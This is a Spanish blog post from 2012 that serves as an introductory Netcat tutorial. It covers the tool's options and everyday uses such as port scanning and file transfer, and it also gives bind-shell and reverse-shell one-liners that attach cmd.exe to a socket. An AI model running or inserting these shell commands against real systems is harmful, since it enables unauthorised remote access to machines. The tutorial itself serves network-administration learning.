lunes, 10 de diciembre de 2012

Seguridad Informática: Netcat


Netcat es una herramienta que permite realizar auditorías de red.  Trabaja directamente en TCP/IP en Windows el comando es: ncat, mientras que en Linux el comando es: nc.

Las opciones que lo acompañan son:


d: Separa a NetCat de la consola y lo deja en modo oculto.
e: programa Asocia un programa al socket que se abra con NetCat.
l:  Pone a NetCat a la escucha de conexiones.
L: Pone a NetCat a la escucha, pero además le indica que cuando se cierre la
conexión abra otra nuevamente.
n: Hace que NetCat no trabaje con nombre de host y solo sea capaz de procesar direcciones IP, evitando el uso de DNS. Esto puede ser útil para chequear el buen funcionamiento de nuestros DNS
o archivo: Sirve para hacer una descarga en hexadecimal de la comunicación que lleva a cabo NetCat.
p: puerto Aquí se especifica el puerto local al cual NetCat se va a pegar.
r: Agrega un factor aleatorio en los puertos especificados.
s: Sirve para pegar a NetCat a una determinada dirección IP.
t: Responde a negociaciones TELNET.
u: Trabaja con el protocolo UDP
v: Modo verboso. Sirve para detallar mas una interacción entre NetCat y algo mas. Se puede agregar otra v mas para detallar mas aun.
z: Se usa para cerrar la conexión una vez que esta se llevo a cabo. Esta opción se usa para el scanneo, evitando que NetCat se pare cuando encuentra un puerto abierto.


Aquí algunas aplicaciones comunes para Netcat:

Escaneo de puertos de una máquina:

nc -v -z ip_equipo_remoto puerto
nc -v -z 192.168.0.2 80

nc -v -z ip_equipo_remoto rango_puertos
nc -v -z 192.168.0.2 1-150

nc -v -z ip_equipo_remoto puertos_definidos
nc -v -z 192.168.0.2 80 8080


Servidor web:

nc -vv -L -p 80 < index.html



Sala de chat:

comando para servidor:
nc -l -p 5000

comando para cliente:
nc 192.168.0.2 5000


Shell remota:

comando para servidor:
nc -l -e cmd.exe -p 5000

comando para cliente:
nc 192.168.0.2 5000


Shell remota inversa:

comando para servidor:
nc -l -p 5000

comando para cliente:
nc 192.168.0.1 5000 -e cmd.exe



Transferencia de archivos:

comando para enviar:
nc -vv -l -p 5000 < /home/archivo.txt

comando para recibir:
nc -vv 192.168.0.2 5000 > archivo.txt


No hay comentarios:

Publicar un comentario

Entradas populares